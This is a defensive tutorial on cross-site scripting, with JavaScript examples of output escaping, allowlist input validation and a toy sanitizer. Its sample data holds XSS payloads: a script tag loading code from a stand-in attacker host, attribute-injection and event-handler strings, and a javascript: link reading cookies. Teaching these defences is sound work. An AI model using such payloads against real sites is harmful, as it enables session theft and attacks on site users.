There are numerous ways that a site’s security can be compromised. One of them is an injection attack, in which untrusted input supplied by an attacker is passed to an interpreter (a database engine, a browser) and ends up being executed as code instead of being treated as data. The two most common types of injection attack are SQL injection (SQLi) and Cross-site Scripting (XSS). Today we will discuss the latter and how to protect your site from XSS vulnerabilities.
Cross-site Scripting is a type of security vulnerability which allows attackers to inject client-side scripts into web pages viewed by other users. The attack is carried out when the victim visits the affected page: the malicious code inserted by the attacker is delivered to the victim inside the page’s HTML and is executed by the browser within the vulnerable site’s origin, so it runs with the victim’s session and privileges on that site. XSS vulnerabilities are most frequent in forums, message boards and websites that allow comments, but they are not limited to these kinds of sites.
In fact, any web page or application that includes unsanitized user input in its output should be considered vulnerable. Some site operators argue that since XSS executes on the client side, it is not the site’s problem. Their website is nonetheless the delivery mechanism for the malicious code, so ignoring these vulnerabilities is professional negligence. Cross-site scripting can also be used to deface a site by changing its content or redirecting visitors to malicious pages, thus attacking the site directly, not only its users.
The ability to execute code in another user’s browser lets the attacker carry out, among others, the following types of attacks:
- Phishing: inserting fake login forms into the site’s own pages, tricking users into willingly handing their credentials to a form that submits them to the attacker.
- Keylogging: by registering a keydown listener with addEventListener on the document, the attacker can capture every keystroke the user types on the page and forward the log to a server he controls.
- Cookie theft: the attacker can read the victim’s cookies for the site through document.cookie and exfiltrate them, obtaining the session ID and similar secrets. Marking the session cookie HttpOnly keeps it out of document.cookie, but injected script can still issue authenticated requests from the victim’s browser, so HttpOnly limits the damage rather than eliminating it.
Stored (a.k.a. Persistent) XSS:
These types of XSS attacks are carried out when the injected code is permanently stored on the target server, for example in a comment, a forum post or a profile field. Every user who later requests the page containing that stored content receives the script and executes it.
Reflected (a.k.a. Non-Persistent) XSS:
Reflected attacks are those where the injected script is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request. Reflected attacks are delivered to victims via another route, such as in an e-mail message, or on some other website.
There are three main ways to prevent XSS attacks:
Escaping:
This method is a must for any website. Escaping (also called output encoding) means taking the data the application has received and encoding it at the moment it is written into the page, so that characters with special meaning in that context are rendered as literal text rather than interpreted as markup. In HTML content the characters to encode are &, <, >, " and ', since an attacker uses < and > to open tags and quotes to break out of attribute values. The right encoding depends on where the data is placed (HTML element content, an attribute value, a JavaScript string, a URL), and data placed in an attribute must also be wrapped in quotes, because escaping alone does not neutralise spaces or = signs.
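The following is an added example, not code from the original article: an HTML escaping function in JavaScript, a vulnerable comment renderer beside its hardened form, and the attribute-context case where escaping without quoting still lets a payload in. The function names and the sample payloads are constructed for this demonstration.

```javascript
// Added example, not code from the original article: output escaping for
// HTML, with a vulnerable renderer, its hardened form, and the attribute
// case where escaping without quoting is not enough. Function names and
// the sample payloads below are constructed for this demo.

// Encode the five characters that let text break out of HTML element
// content or a quoted attribute value.
function escapeHtml(untrusted) {
  return String(untrusted)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable: user-controlled values are concatenated straight into markup.
function renderCommentUnsafe(author, body) {
  return `<div class="comment"><b>${author}</b>: ${body}</div>`;
}

// Hardened: every untrusted value is escaped for the HTML content context.
function renderCommentSafe(author, body) {
  return `<div class="comment"><b>${escapeHtml(author)}</b>: ${escapeHtml(body)}</div>`;
}

// Attribute context, hardened: the value is escaped AND double-quoted, so
// the browser sees exactly one attribute whatever the value contains.
function renderSearchBoxSafe(query) {
  return `<input name="q" value="${escapeHtml(query)}">`;
}

// Attribute context done wrong: escaped but left unquoted. escapeHtml()
// does not touch spaces or '=', so a payload containing none of the five
// special characters still adds onfocus= and autofocus attributes.
function renderSearchBoxUnquoted(query) {
  return `<input name="q" value=${escapeHtml(query)}>`;
}

// Constructed attacker inputs for the demo.
const SCRIPT_PAYLOAD = '<script src="//attacker.example/k.js"></script>';
const ATTR_PAYLOAD = 'x onfocus=alert(1) autofocus';

// True when the rendered HTML still contains a raw <script tag.
function leaksScriptTag(html) {
  return html.includes('<script');
}

function main() {
  console.log(renderCommentUnsafe('mallory', SCRIPT_PAYLOAD)); // script would run
  console.log(renderCommentSafe('mallory', SCRIPT_PAYLOAD));   // shown as text
  console.log(renderSearchBoxSafe(ATTR_PAYLOAD));              // one attribute
  console.log(renderSearchBoxUnquoted(ATTR_PAYLOAD));          // three attributes
}

main();
```

Run it with node; the last two lines of output show why quoting is part of the attribute rule: the quoted form contains the whole payload as one value, while the unquoted form hands the browser an onfocus handler that fires as soon as autofocus gives the input focus.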
Validating Input:
This is not considered to be a primary XSS prevention method, but it reduces the impact of an attack if a vulnerability is found. Validating input is the process of checking, at the point where data enters the application, that each value has the expected type, length, format and range, and rejecting anything that does not match: an allowlist of what is acceptable, rather than a blocklist of known-bad strings. While allowlisting and input validation are more commonly associated with SQL injection, they also serve as an additional layer of defence against XSS: a username that may only contain letters and digits, or a link that may only use the http or https scheme, leaves far less room for a payload.
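As an added example (not the article’s own code), here is allowlist validation in JavaScript for two fields a comment-enabled site typically accepts: a username and a user-supplied link. The field names, the username rule and the assumed site origin are illustrative choices for this demonstration.

```javascript
// Added example, not code from the original article: allowlist input
// validation for a username and a user-supplied link. The rules, field
// names and SITE_ORIGIN below are assumptions made for this demo.

// Username: only letters, digits and underscore, 3 to 32 characters.
// In JavaScript '$' without the 'm' flag matches only at the very end of
// the string, so a trailing newline cannot slip past this check.
const USERNAME_RE = /^[A-Za-z0-9_]{3,32}$/;

function isValidUsername(value) {
  return typeof value === 'string' && USERNAME_RE.test(value);
}

// Link: parse with the WHATWG URL parser instead of string-matching the
// scheme, then allow only http and https. The parser lowercases the scheme
// and strips leading/trailing whitespace and embedded tab/newline
// characters, so "JavaScript:", " javascript:" and "java\tscript:" all end
// up with the javascript: scheme and are rejected. Relative links are
// resolved against an assumed site origin so they remain allowed.
const SITE_ORIGIN = 'https://example.com/'; // assumption for the demo

function isSafeHref(value) {
  if (typeof value !== 'string' || value.length > 2048) return false;
  let url;
  try {
    url = new URL(value, SITE_ORIGIN);
  } catch {
    return false; // unparseable input is rejected, not "repaired"
  }
  // This vets the scheme only; a protocol-relative "//other.host/" still
  // passes, so open-redirect checks are a separate concern.
  return url.protocol === 'http:' || url.protocol === 'https:';
}

// Validate a whole submission and report every failing field, so the
// request can be rejected up front instead of stored and escaped later.
function validateProfile(input) {
  const errors = [];
  if (!isValidUsername(input.username)) errors.push('username');
  if (!isSafeHref(input.homepage)) errors.push('homepage');
  return { ok: errors.length === 0, errors };
}

// Constructed sample submissions.
const goodProfile = { username: 'alice_01', homepage: 'https://alice.example/' };
const badProfile = { username: '<script>', homepage: 'javascript:alert(document.cookie)' };

console.log(validateProfile(goodProfile)); // { ok: true, errors: [] }
console.log(validateProfile(badProfile));  // { ok: false, errors: [ 'username', 'homepage' ] }
```

The design choice worth copying is to let a real parser decide what the scheme is rather than searching the string for "javascript:", since case changes and embedded tab characters defeat naive string checks but are normalised away by the parser. Validation still does not replace escaping: the username rule rejects a payload outright, but a free-text comment field cannot be validated this way and must be escaped on output.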
Sanitizing:
This method is an effective way to prevent cross-site scripting, but it should not be used alone. It is especially important on sites that allow users to submit HTML markup, where escaping everything would destroy the formatting: a sanitizer keeps an allowlist of harmless tags and attributes and strips or escapes everything else, turning unacceptable input into a safe format rather than rejecting it. There are several well-maintained sanitizing libraries available; use one of them rather than writing your own filter, since a home-grown blocklist of dangerous tags is easily bypassed.
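To show the allowlist principle concretely, here is an added example (not the article’s code and not a production sanitizer): a tokenizer that re-emits a small fixed set of formatting tags from their names alone and HTML-escapes everything else. The tag set is an assumption for the demo, and a real site should use a maintained library such as DOMPurify instead of this.

```javascript
// Added example, not code from the original article: an allowlist
// sanitizer for a tiny markup subset, illustrating the principle only.
// The ALLOWED_TAGS set is an assumption for this demo; production code
// should use a maintained library such as DOMPurify.

const ALLOWED_TAGS = new Set(['b', 'i', 'em', 'strong', 'p', 'br']);

function escapeHtml(untrusted) {
  return String(untrusted)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// One complete tag: optional '/', a tag name, then anything up to '>'.
// Whatever this does not match (including a lone '<') is treated as text.
const TAG_RE = /<(\/?)([a-zA-Z][a-zA-Z0-9]*)[^>]*>/g;

// Output is safe for the HTML element-content context because the only
// raw '<' ever emitted comes from an allowlisted tag name; every other
// character of the input passes through escapeHtml().
function sanitize(untrustedHtml) {
  const src = String(untrustedHtml);
  let out = '';
  let last = 0;
  for (const m of src.matchAll(TAG_RE)) {
    out += escapeHtml(src.slice(last, m.index)); // text before this tag
    const closing = m[1] === '/';
    const name = m[2].toLowerCase();
    if (ALLOWED_TAGS.has(name)) {
      // Rebuild the tag from its name only: attributes such as
      // onmouseover= or href= are dropped, not filtered.
      out += closing ? `</${name}>` : `<${name}>`;
    } else {
      // Unknown or dangerous tag: keep it as visible text, never as markup.
      out += escapeHtml(m[0]);
    }
    last = m.index + m[0].length;
  }
  out += escapeHtml(src.slice(last)); // trailing text
  return out;
}

// Constructed sample inputs.
const SAMPLES = [
  '<b>hi</b> <script>alert(1)</script>',
  '<B onmouseover="alert(1)">x</B>',
  '<a href="javascript:alert(1)">go</a>',
  '<img src=x onerror=alert(1)>',
  '1 < 2 && 3 > 2',
];

for (const s of SAMPLES) console.log(sanitize(s));
```

The point of rebuilding allowed tags from the name alone is that there is nothing to filter: attribute handlers never reach the output, so case tricks like onMouseOver or a href pointing at a javascript: URL are irrelevant. What this toy version cannot do is preserve legitimate attributes (an href on a link), which is exactly where a real sanitizer earns its keep and where hand-written code tends to go wrong.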